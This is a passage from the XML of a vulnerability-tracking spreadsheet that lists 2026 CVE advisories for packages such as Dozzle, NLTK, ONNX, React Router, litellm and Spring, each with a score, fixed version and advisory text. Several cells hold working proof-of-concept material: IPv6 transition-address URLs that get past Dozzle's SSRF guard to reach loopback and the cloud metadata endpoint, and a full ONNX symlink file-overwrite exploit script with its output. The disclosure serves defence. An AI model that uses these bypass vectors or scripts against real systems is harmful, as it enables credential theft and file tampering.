r="G79" s="5" t="inlineStr" /><c r="H79" s="5" t="n"><v>0.002</v></c><c r="I79" s="5" t="inlineStr" /><c r="J79" s="5" t="inlineStr" /><c r="K79" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L79" s="5" t="inlineStr"><is><t>npm:n8n</t></is></c><c r="M79" s="5" t="inlineStr"><is><t>2.37.7, 2.38.2</t></is></c><c r="N79" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P79" s="5" t="inlineStr" /><c r="Q79" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R79" s="5" t="inlineStr"><is><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is></c><c r="S79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t></is></c></row><row r="80"><c r="A80" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B80" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C80" s="5" t="inlineStr"><is><t>CVE-2026-73087</t></is></c><c r="D80" s="5" t="n"><v>2.3</v></c><c r="E80" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F80" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G80" s="5" t="inlineStr" /><c r="H80" s="5" t="n"><v>0.003</v></c><c r="I80" s="5" t="inlineStr" /><c r="J80" s="5" t="inlineStr" /><c r="K80" s="5" t="inlineStr" /><c r="L80" s="5" t="inlineStr"><is><t>go:github.com/amir20/dozzle</t></is></c><c r="M80" s="5" t="inlineStr"><is><t>1.29.1-0.20260804193351-8cf7ccd5ee04</t></is></c><c r="N80" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O80" s="5" t="inlineStr" /><c r="P80" s="5" t="inlineStr" /><c r="Q80" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R80" s="5" t="inlineStr"><is><t>## Summary

The `isBlockedIP` SSRF guard in Dozzle's webhook notification dispatcher blocks loopback, link-local, multicast, and unspecified addresses but does not recognize IPv6 transition mechanism addresses (RFC 3056 6to4, RFC 6052 NAT64, RFC 4380 Teredo) that embed arbitrary IPv4 addresses. An authenticated user can bypass the guard to reach loopback services, cloud metadata endpoints (169.254.169.254), and other blocked ranges via webhook notification URLs.

## Affected component / versions

- Package: `github.com/amir20/dozzle`
- Affected versions: all versions with SSRF guard (current HEAD [`b9df313`](https://github.com/amir20/dozzle/commit/b9df31356fc024e6768a1aac605844dc041d95ee))
- Vulnerable code: `internal/notification/dispatcher/webhook.go`

## Details

### Root cause (CWE-918)

[`internal/notification/dispatcher/webhook.go:32-51`](https://github.com/amir20/dozzle/blob/b9df31356fc024e6768a1aac605844dc041d95ee/internal/notification/dispatcher/webhook.go#L32-L51):

```go
func isBlockedIP(ip net.IP) bool {
	if ip.IsLoopback() ||
		ip.IsLinkLocalUnicast() ||
		ip.IsLinkLocalMulticast() ||
		ip.IsMulticast() ||
		ip.IsInterfaceLocalMulticast() ||
		ip.IsUnspecified() {
		return true
	}
	if v4 := ip.To4(); v4 != nil &amp;&amp; zeroNetV4.Contains(v4) {
		return true
	}
	if ip.Equal(net.IPv4bcast) {
		return true
	}
	return false
}
```

The guard intentionally allows RFC 1918 private ranges for self-hosted webhook targets, but blocks loopback (127.0.0.0/8, ::1), link-local (169.254.0.0/16, fe80::/10), and other non-routable addresses. IPv6 transition mechanism addresses bypass all these checks:

| Mechanism | Prefix | Embeds | `isBlockedIP` result |
|-----------|--------|--------|---------------------|
| 6to4 | `2002::/16` | any IPv4 in bits 16-47 | `false` |
| NAT64 WKP | `64:ff9b::/96` | any IPv4 in bits 96-127 | `false` |
| Teredo | `2001:0000::/32` | any IPv4 in bits 96-127 | `false` |

### Reachability / trust boundary

The `safeDialContext` function (line 53) resolves hostnames and checks each IP against `isBlockedIP` before establishing a TCP connection. This is used as the `DialContext` for the webhook HTTP client (line 115).

Webhook URLs are configured by authenticated Dozzle users through the notification settings UI. The guard exists to prevent authenticated users from using webhook delivery as a proxy to reach the host machine's loopback services or cloud metadata endpoint.

### Attack chain

1. Authenticated user creates a webhook notification with URL `http://[2002:7f00:0001::1]:8080/` (6to4 embedding 127.0.0.1)
2. When a notification triggers, Dozzle's webhook dispatcher calls `safeDialContext`
3. The IPv6 address `2002:7f00:0001::1` is checked against `isBlockedIP` -- all predicates return false
4. Connection proceeds to the 6to4 relay which routes to 127.0.0.1
5. The webhook POST reaches the host's loopback services

## Impact

An authenticated user can bypass the SSRF guard to:

- Reach cloud metadata service at 169.254.169.254 via `2002:a9fe:a9fe::1` (6to4) to steal instance credentials
- Reach localhost services via `64:ff9b::7f00:1` (NAT64) or `2002:7f00:0001::1` (6to4)
- The webhook response body is logged at debug level but not returned to the user, making this a semi-blind SSRF (status code is returned)

Note: RFC 1918 private ranges are intentionally allowed by the guard. This bypass specifically targets the blocked ranges (loopback and link-local/metadata) that the guard explicitly intends to prevent.

## Proof of concept

Bypass vectors:

```
# 6to4 embedding 127.0.0.1 (bypasses IsLoopback)
http://[2002:7f00:0001::1]:8080/

# NAT64 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[64:ff9b::a9fe:a9fe]/latest/meta-data/

# 6to4 embedding 169.254.169.254 (bypasses IsLinkLocalUnicast)
http://[2002:a9fe:a9fe::1]/latest/meta-data/

# Teredo embedding 127.0.0.1
http://[2001:0000:dead:beef:0000:0000:7f00:0001]:8080/
```

Verification that `isBlockedIP` returns false for all vectors:

```go
package main

import (
    "fmt"
    "net"
)

func isBlockedIP(ip net.IP) bool {
    return ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() ||
        ip.IsMulticast() || ip.IsInterfaceLocalMulticast() || ip.IsUnspecified()
}

func main() {
    for _, v := range []string{
        "2002:7f00:0001::1",    // 6to4 -&gt; 127.0.0.1
        "64:ff9b::a9fe:a9fe",   // NAT64 -&gt; 169.254.169.254
        "2002:a9fe:a9fe::1",    // 6to4 -&gt; 169.254.169.254
    } {
        ip := net.ParseIP(v)
        fmt.Printf("%-35s blocked=%v\n", v, isBlockedIP(ip))
    }
}
// Output: all false
```

## Remediation

Add IPv6 transition mechanism prefix checks to `isBlockedIP`:

```go
func isBlockedIP(ip net.IP) bool {
	// ... existing checks ...

	// IPv6 transition mechanisms embedding arbitrary IPv4
	if len(ip) == net.IPv6len {
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x02 { return true } // 6to4
		if ip[0] == 0x00 &amp;&amp; ip[1] == 0x64 &amp;&amp; ip[2] == 0xff &amp;&amp; ip[3] == 0x9b { return true } // NAT64
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x01 &amp;&amp; ip[2] == 0x00 &amp;&amp; ip[3] == 0x00 { return true } // Teredo
	}
	return false
}
```

## Credit

Reported by tonghuaroot (tonghuaroot@gmail.com).</t></is></c><c r="S80" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t></is></c></row><row r="81"><c r="A81" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B81" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C81" s="5" t="inlineStr"><is><t>CVE-2026-8769</t></is></c><c r="D81" s="5" t="n"><v>2.1</v></c><c r="E81" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F81" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G81" s="5" t="inlineStr" /><c r="H81" s="5" t="n"><v>0.006</v></c><c r="I81" s="5" t="inlineStr" /><c r="J81" s="5" t="inlineStr" /><c r="K81" s="5" t="inlineStr" /><c r="L81" s="5" t="inlineStr"><is><t>npm:@ai-sdk/provider-utils</t></is></c><c r="M81" s="5" t="inlineStr"><is><t>3.0.28, 4.0.33, 5.0.1</t></is></c><c r="N81" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O81" s="5" t="inlineStr" /><c r="P81" s="5" t="inlineStr" /><c r="Q81" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R81" s="5" t="inlineStr"><is><t>Versions of `@ai-sdk/provider-utils` before 3.0.28, from 4.0.0 before 4.0.33, and from 5.0.0 before 5.0.1 are vulnerable to uncontrolled resource consumption. The `createJsonResponseHandler`, `createJsonErrorResponseHandler`, and `createStatusCodeErrorResponseHandler` functions in `packages/provider-utils/src/response-handler.ts` read response bodies without a shared size limit, allowing a remote attacker with low privileges to cause excessive memory consumption. The exploit has been publicly disclosed and may be utilized.</t></is></c><c r="S81" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-8769</t></is></c></row><row r="82"><c r="A82" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B82" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C82" s="5" t="inlineStr"><is><t>CVE-2025-59057</t></is></c><c r="D82" s="5" t="inlineStr" /><c r="E82" s="5" t="inlineStr" /><c r="F82" s="5" t="inlineStr" /><c r="G82" s="5" t="inlineStr" /><c r="H82" s="5" t="n"><v>0.005</v></c><c r="I82" s="5" t="inlineStr" /><c r="J82" s="5" t="inlineStr" /><c r="K82" s="5" t="inlineStr" /><c r="L82" s="5" t="inlineStr"><is><t>npm:@remix-run/react, npm:react-router</t></is></c><c r="M82" s="5" t="inlineStr"><is><t>2.17.1, 7.9.0</t></is></c><c r="N82" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O82" s="5" t="inlineStr" /><c r="P82" s="5" t="inlineStr" /><c r="Q82" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R82" s="5" t="inlineStr"><is><t>A XSS vulnerability exists in in React Router's `meta()`/`&lt;Meta&gt;` APIs in [Framework Mode](https://reactrouter.com/start/modes#framework) when generating `script:ld+json` tags which could allow arbitrary JavaScript execution during SSR if untrusted content is used to generate the tag.

&gt; [!NOTE]
&gt; This does not impact applications using [Declarative Mode](https://reactrouter.com/start/modes#declarative) (`&lt;BrowserRouter&gt;`) or [Data Mode](https://reactrouter.com/start/modes#data) (`createBrowserRouter`/`&lt;RouterProvider&gt;`).</t></is></c><c r="S82" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-59057</t></is></c></row><row r="83"><c r="A83" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B83" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C83" s="5" t="inlineStr"><is><t>CVE-2026-12259</t></is></c><c r="D83" s="5" t="inlineStr" /><c r="E83" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F83" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G83" s="5" t="inlineStr" /><c r="H83" s="5" t="n"><v>0.001</v></c><c r="I83" s="5" t="inlineStr" /><c r="J83" s="5" t="inlineStr" /><c r="K83" s="5" t="inlineStr" /><c r="L83" s="5" t="inlineStr"><is><t>pip:nltk</t></is></c><c r="M83" s="5" t="inlineStr"><is><t>3.9.3</t></is></c><c r="N83" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O83" s="5" t="inlineStr" /><c r="P83" s="5" t="inlineStr" /><c r="Q83" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="R83" s="5" t="inlineStr"><is><t>NLTK's package downloader in nltk/downloader.py does not verify file integrity after download and before extraction.

The download flow at lines 789-825:
1. File is downloaded to a temp path via HTTP
2. os.replace(tmp_filepath, filepath) moves it to the final location (line 799)
3. Extraction begins via _unzip_iter() (line 825)

Between steps 2 and 3, there is no SHA-256 verification. The checksum logic exists in _pkg_status() (lines 982-1015) but it is only used BEFORE download as a status check ("is this package already installed and up-to-date?"). It is never called after download to verify the file that was actually received.

Attack vectors:
1. MITM during HTTP download (NLTK downloads from http:// by default on some mirrors)
2. Race condition on shared filesystems (attacker replaces file between os.replace and _unzip_iter)
3. DNS poisoning redirecting to attacker-controlled server

PoC:
```python
import nltk
import unittest.mock
import zipfile
import io
import os

# Create a malicious zip that will be "downloaded"
malicious_zip = io.BytesIO()
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('punkt_tab/tokenizers/punkt_tab/english.pickle', 
                b'MALICIOUS PAYLOAD - attacker controlled content')

# Patch urllib to return our malicious zip
with unittest.mock.patch('urllib.request.urlopen') as mock_urlopen:
    mock_response = unittest.mock.MagicMock()
    mock_response.read.return_value = malicious_zip.getvalue()
    mock_response.headers = {'Content-Length': str(len(malicious_zip.getvalue()))}
    mock_urlopen.return_value = mock_response
    
    # Download proceeds, no integrity check catches the swap
    # nltk.download('punkt_tab')  # Would install attacker payload
```

This is distinct from CVE-2024-39705 (pickle deserialization via download) and CVE-2025-14009 (zip-slip path traversal). Those address what happens AFTER extraction. This finding addresses the gap BEFORE extraction where integrity is never verified.

Suggested fix: After os.replace() and before _unzip_iter(), compute SHA-256 of the final file and compare against the expected checksum from the package index. Reject and delete the file if the hash does not match.</t></is></c><c r="S83" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12259</t></is></c></row><row r="84"><c r="A84" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B84" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C84" s="5" t="inlineStr"><is><t>CVE-2026-15603</t></is></c><c r="D84" s="5" t="inlineStr" /><c r="E84" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F84" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G84" s="5" t="inlineStr" /><c r="H84" s="5" t="n"><v>0.002</v></c><c r="I84" s="5" t="inlineStr" /><c r="J84" s="5" t="inlineStr" /><c r="K84" s="5" t="inlineStr" /><c r="L84" s="5" t="inlineStr"><is><t>npm:morgan</t></is></c><c r="M84" s="5" t="inlineStr"><is><t>1.12.0</t></is></c><c r="N84" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O84" s="5" t="inlineStr" /><c r="P84" s="5" t="inlineStr" /><c r="Q84" s="5" t="inlineStr"><is><t>CWE-117</t></is></c><c r="R84" s="5" t="inlineStr"><is><t>### Impact

Morgan writes attacker-controlled request data to the access log through its tokens. The 1.11.0 fix neutralizes C0 control characters, DEL, and backslash, but it does not escape the Unicode line separators `U+0085` (NEL), `U+2028` (LINE SEPARATOR), or `U+2029` (PARAGRAPH SEPARATOR). These code points are reachable through several tokens, including the request URL (`:url`), request headers such as `:user-agent` and `:referrer`, arbitrary `:req[header]` values, and the Basic auth username (`:remote-user`). NEL is valid `obs-text` in HTTP header values, so an attacker can place it in an ordinary request header.

When such a value is logged, the raw code points survive into the emitted access-log record, and downstream ECMAScript-aware or Unicode-aware log processing splits the single physical record into multiple logical records. This allows an attacker to forge log entries. The built-in `combined`, `common`, `default`, and `short` formats are affected, as well as any custom format. This is an incomplete fix of CVE-2026-5078.

### Patches

Users should upgrade to version 1.12.0.

### Workarounds

None. The affected values include the request URL and request headers, which are core to access logging, so there is no practical format-based mitigation. Upgrade to 1.12.0.</t></is></c><c r="S84" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15603</t></is></c></row><row r="85"><c r="A85" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B85" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C85" s="5" t="inlineStr"><is><t>CVE-2026-19693</t></is></c><c r="D85" s="5" t="inlineStr" /><c r="E85" s="5" t="inlineStr" /><c r="F85" s="5" t="inlineStr" /><c r="G85" s="5" t="inlineStr" /><c r="H85" s="5" t="n"><v>0.003</v></c><c r="I85" s="5" t="inlineStr" /><c r="J85" s="5" t="inlineStr" /><c r="K85" s="5" t="inlineStr" /><c r="L85" s="5" t="inlineStr"><is><t>npm:extract-zip</t></is></c><c r="M85" s="5" t="inlineStr" /><c r="N85" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O85" s="5" t="inlineStr" /><c r="P85" s="5" t="inlineStr" /><c r="Q85" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R85" s="5" t="inlineStr"><is><t>extract-zip through 2.0.1 containment-checks only the parent directory of each archive entry and never the entry's own final path component, so an archive containing two entries with identical names - a symlink whose target is outside the destination, followed by a regular file - writes through the planted symlink and yields an arbitrary file write outside the destination directory.</t></is></c><c r="S85" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19693</t></is></c></row><row r="86"><c r="A86" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B86" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C86" s="5" t="inlineStr"><is><t>CVE-2026-21884</t></is></c><c r="D86" s="5" t="inlineStr" /><c r="E86" s="5" t="inlineStr" /><c r="F86" s="5" t="inlineStr" /><c r="G86" s="5" t="inlineStr" /><c r="H86" s="5" t="n"><v>0.005</v></c><c r="I86" s="5" t="inlineStr" /><c r="J86" s="5" t="inlineStr" /><c r="K86" s="5" t="inlineStr" /><c r="L86" s="5" t="inlineStr"><is><t>npm:@remix-run/react, npm:react-router</t></is></c><c r="M86" s="5" t="inlineStr"><is><t>2.17.3, 7.12.0</t></is></c><c r="N86" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O86" s="5" t="inlineStr" /><c r="P86" s="5" t="inlineStr" /><c r="Q86" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R86" s="5" t="inlineStr"><is><t>A XSS vulnerability exists in in React Router's `&lt;ScrollRestoration&gt;` API in [Framework Mode](https://reactrouter.com/start/modes#framework) when using the `getKey`/`storageKey` props during Server-Side Rendering which could allow arbitrary JavaScript execution during SSR if untrusted content is used to generate the keys.

&gt; [!NOTE]
&gt; This does not impact applications if developers have [disabled server-side rendering](https://reactrouter.com/how-to/spa) in Framework Mode, or if they are using [Declarative Mode](https://reactrouter.com/start/modes#declarative) (`&lt;BrowserRouter&gt;`) or [Data Mode](https://reactrouter.com/start/modes#data) (`createBrowserRouter`/`&lt;RouterProvider&gt;`).</t></is></c><c r="S86" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-21884</t></is></c></row><row r="87"><c r="A87" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B87" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C87" s="5" t="inlineStr"><is><t>CVE-2026-33244</t></is></c><c r="D87" s="5" t="inlineStr" /><c r="E87" s="5" t="inlineStr" /><c r="F87" s="5" t="inlineStr" /><c r="G87" s="5" t="inlineStr" /><c r="H87" s="5" t="n"><v>0.001</v></c><c r="I87" s="5" t="inlineStr" /><c r="J87" s="5" t="inlineStr" /><c r="K87" s="5" t="inlineStr" /><c r="L87" s="5" t="inlineStr"><is><t>npm:react-router</t></is></c><c r="M87" s="5" t="inlineStr"><is><t>7.13.2</t></is></c><c r="N87" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O87" s="5" t="inlineStr" /><c r="P87" s="5" t="inlineStr" /><c r="Q87" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R87" s="5" t="inlineStr"><is><t>When using React Router v7 [Framework Mode](https://reactrouter.com/start/modes#framework) with [Pre-rendering](https://reactrouter.com/how-to/pre-rendering) enabled, an improper neutralization of the HTTP `Location` header value can permit Cross-Site Scripting (XSS) in statically generated HTML files if the redirect location comes from an untrusted source.

&gt; [!NOTE]
&gt; This does not impact your React Router application if you are using [Declarative Mode](https://reactrouter.com/start/modes#declarative) (`&lt;BrowserRouter&gt;`) or [Data Mode](https://reactrouter.com/start/modes#data) (`createBrowserRouter`/`&lt;RouterProvider&gt;`).</t></is></c><c r="S87" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33244</t></is></c></row><row r="88"><c r="A88" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B88" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C88" s="5" t="inlineStr"><is><t>CVE-2026-37004</t></is></c><c r="D88" s="5" t="inlineStr" /><c r="E88" s="5" t="inlineStr" /><c r="F88" s="5" t="inlineStr" /><c r="G88" s="5" t="inlineStr" /><c r="H88" s="5" t="n"><v>0.005</v></c><c r="I88" s="5" t="inlineStr" /><c r="J88" s="5" t="inlineStr" /><c r="K88" s="5" t="inlineStr" /><c r="L88" s="5" t="inlineStr"><is><t>pip:litellm</t></is></c><c r="M88" s="5" t="inlineStr"><is><t>1.83.7</t></is></c><c r="N88" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O88" s="5" t="inlineStr" /><c r="P88" s="5" t="inlineStr" /><c r="Q88" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="R88" s="5" t="inlineStr"><is><t>BerriAI litellm &lt;=1.82.4 is vulnerable to Server-Side Template Injection (SSTI), which allows unauthenticated remote attackers to execute arbitrary OS commands via a crafted dotprompt_content parameter in the /prompts/test endpoint due to use of an unsandboxed jinja2.Environment.</t></is></c><c r="S88" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-37004</t></is></c></row><row r="89"><c r="A89" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B89" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C89" s="5" t="inlineStr"><is><t>CVE-2026-41855</t></is></c><c r="D89" s="5" t="inlineStr" /><c r="E89" s="5" t="inlineStr" /><c r="F89" s="5" t="inlineStr" /><c r="G89" s="5" t="inlineStr" /><c r="H89" s="5" t="n"><v>0.003</v></c><c r="I89" s="5" t="inlineStr" /><c r="J89" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K89" s="5" t="inlineStr" /><c r="L89" s="5" t="inlineStr"><is><t>maven:org.springframework:spring-jms</t></is></c><c r="M89" s="5" t="inlineStr"><is><t>6.2.19, 7.0.8</t></is></c><c r="N89" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O89" s="5" t="inlineStr" /><c r="P89" s="5" t="inlineStr" /><c r="Q89" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R89" s="5" t="inlineStr"><is><t>In an untrusted JMS environment, org.springframework.jms.support.converter.MappingJackson2MessageConverter and org.springframework.jms.support.converter.JacksonJsonMessageConverter allow arbitrary class instantiation, which can lead to unauthorized actions via gadget class deserialization.

Affected versions:
Spring Framework 7.0.0 through 7.0.7; 6.2.0 through 6.2.18; 6.1.0 through 6.1.27; 5.3.0 through 5.3.48.</t></is></c><c r="S89" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-41855</t></is></c></row><row r="90"><c r="A90" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B90" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C90" s="5" t="inlineStr"><is><t>CVE-2026-49114</t></is></c><c r="D90" s="5" t="inlineStr" /><c r="E90" s="5" t="inlineStr" /><c r="F90" s="5" t="inlineStr" /><c r="G90" s="5" t="inlineStr" /><c r="H90" s="5" t="n"><v>0.001</v></c><c r="I90" s="5" t="inlineStr" /><c r="J90" s="5" t="inlineStr" /><c r="K90" s="5" t="inlineStr" /><c r="L90" s="5" t="inlineStr"><is><t>pip:onnx</t></is></c><c r="M90" s="5" t="inlineStr"><is><t>1.21.0</t></is></c><c r="N90" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O90" s="5" t="inlineStr" /><c r="P90" s="5" t="inlineStr" /><c r="Q90" s="5" t="inlineStr"><is><t>CWE-22, CWE-59, CWE-367</t></is></c><c r="R90" s="5" t="inlineStr"><is><t>### Summary

The `save_external_data` method seems to include multiple issues introducing a local TOCTOU vulnerability, an arbitrary file read/write on any system. It potentially includes a path validation bypass on Windows systems.
Regarding the TOCTOU, an attacker seems to be able to overwrite victim's files via symlink following under the same privilege scope.
The mentioned function can be found here: https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L188

### Details

#### Toctou
The vulnerable code pattern:
```python
   # CHECK - Is this a file?
   if not os.path.isfile(external_data_file_path):
       # Line 228-229: USE #1 - Create if it doesn't exist
       with open(external_data_file_path, "ab"):
           pass
   
   # Open for writing
   with open(external_data_file_path, "r+b") as data_file:
       # Lines 233-243: Write tensor data
       data_file.seek(0, 2)
       if info.offset is not None:
           file_size = data_file.tell()
           if info.offset &gt; file_size:
               data_file.write(b"\0" * (info.offset - file_size))
           data_file.seek(info.offset)
       offset = data_file.tell()
       data_file.write(tensor.raw_data)
```
There is a time gap between `os.path.isfile` and `open` with no atomic file creation flags (e.g. `O_EXCEL | O_CREAT`) allowing the attacker to create a symlink that is being followed (absence of `O_NOFOLLOW`), between these two calls. By combining these, the attack is possible as shown below in the PoC section.

#### Bypass
There is also a potential validation bypass on Windows systems in the same method (https://github.com/onnx/onnx/blob/main/onnx/external_data_helper.py#L203) allowing absolute paths like `C:\` (only 1 part):
```python
if location_path.is_absolute() and len(location_path.parts) &gt; 1
```
This may allow Windows Path Traversals (not 100% verified as I am emulating things on a Debian distro).

### PoC

Install the dependencies and run this:
```python
import os
import sys
import tempfile
import numpy as np
import onnx
from onnx import TensorProto, helper
from onnx.numpy_helper import from_array

# Create a temporary directory for our poc
with tempfile.TemporaryDirectory() as tmpdir:
    print(f"[*] Working directory: {tmpdir}")

    # Create a "sensitive" file that we'll overwrite
    sensitive_file = os.path.join(tmpdir, "sensitive.txt")
    with open(sensitive_file, 'w') as f:
        f.write("SENSITIVE DATA - DO NOT OVERWRITE")

    original_content = open(sensitive_file, 'rb').read()
    print(f"[*] Created sensitive file: {sensitive_file}")
    print(f"    Original content: {original_content}")

    # Create a simple ONNX model with a large tensor
    print("[*] Creating ONNX model with external data...")

    # Create a tensor with data &gt; 1KB (to trigger external data)
    large_array = np.ones((100, 100), dtype=np.float32)  # 40KB tensor
    large_tensor = from_array(large_array, name='large_weight')

    # Create a minimal model
    model = helper.make_model(
        helper.make_graph(
            [helper.make_node('Identity', ['input'], ['output'])],
            'minimal_model',
            [helper.make_tensor_value_info('input', TensorProto.FLOAT, [100, 100])],
            [helper.make_tensor_value_info('output', TensorProto.FLOAT, [100, 100])],
            [large_tensor]
        )
    )

    # Save model with external data to create the external data file
    model_path = os.path.join(tmpdir, "model.onnx")
    external_data_name = "data.bin"
    external_data_path = os.path.join(tmpdir, external_data_name)

    onnx.save_model(
        model, 
        model_path,
        save_as_external_data=True,
        all_tensors_to_one_file=True,
        location=external_data_name,
        size_threshold=1024
    )

    print(f"[+] Model saved: {model_path}")
    print(f"[+] External data created: {external_data_path}")

    # Now comes the attack: replace the external data file with a symlink
    print("[!] ATTACK: Replacing external data file with symlink...")

    # Remove the legitimate external data file
    if os.path.exists(external_data_path):
        os.remove(external_data_path)
        print(f"    Removed: {external_data_path}")

    # Create symlink pointing to sensitive file
    os.symlink(sensitive_file, external_data_path)
    print(f"    Created symlink: {external_data_path} -&gt; {sensitive_file}")

    # Now load and re-save the model, which will trigger the vulnerability
    print("Loading model and saving with external data...")
    try:
        # Load the model (without loading external data)
        loaded_model = onnx.load(model_path, load_external_data=False)

        # Modify the model slightly (to ensure we write new data)
        loaded_model.graph.initializer[0].raw_data = large_array.tobytes()

        # Save again - this will call save_external_data() and follow the symlink
        onnx.save_model(
            loaded_model,
            model_path,
            save_as_external_data=True,
            all_tensors_to_one_file=True,
            location=external_data_name,
            size_threshold=1024
        )
    except Exception as e:
        print(f"[-] Error: {e}")
    
    # Check if the sensitive file was overwritten
    print("[*] Checking if sensitive file was modified...")
    modified_content = open(sensitive_file, 'rb').read()
    
    print(f"    Original size: {len(original_content)} bytes")
    print(f"    Current size:  {len(modified_content)} bytes")
    print(f"    Original content: {original_content[:50]}")
    print(f"    Current content:  {modified_content[:50]}...")
    print()
    
    if modified_content != original_content:
        print("[!] Success!")
    else:
        print("[-] Failure")
```
Output:
```
[*] Working directory: /tmp/tmpqy7z88_l
[*] Created sensitive file: /tmp/tmpqy7z88_l/sensitive.txt
    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'

[*] Creating ONNX model with external data...
[+] Model saved: /tmp/tmpqy7z88_l/model.onnx
[+] External data created: /tmp/tmpqy7z88_l/data.bin
[!] ATTACK: Replacing external data file with symlink...
    Removed: /tmp/tmpqy7z88_l/data.bin
    Created symlink: /tmp/tmpqy7z88_l/data.bin -&gt; /tmp/tmpqy7z88_l/sensitive.txt
Loading model and saving with external data...
[*] Checking if sensitive file was modified...
    Original size: 33 bytes
    Current size:  40033 bytes
    Original content: b'SENSITIVE DATA - DO NOT OVERWRITE'
    Current content:  b'SENSITIVE DATA - DO NOT OVERWRITE\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00\x00\x80?\x00'...
```
Successfully overwritting the "sensitive data" file.

### Impact
The impact may include filesystem injections (e.g. on ssh keys, shell configs, crons) or destruction of files, affecting integrity and availability.

### Mitigations
1. Atomic file creation
2. Symlink protection
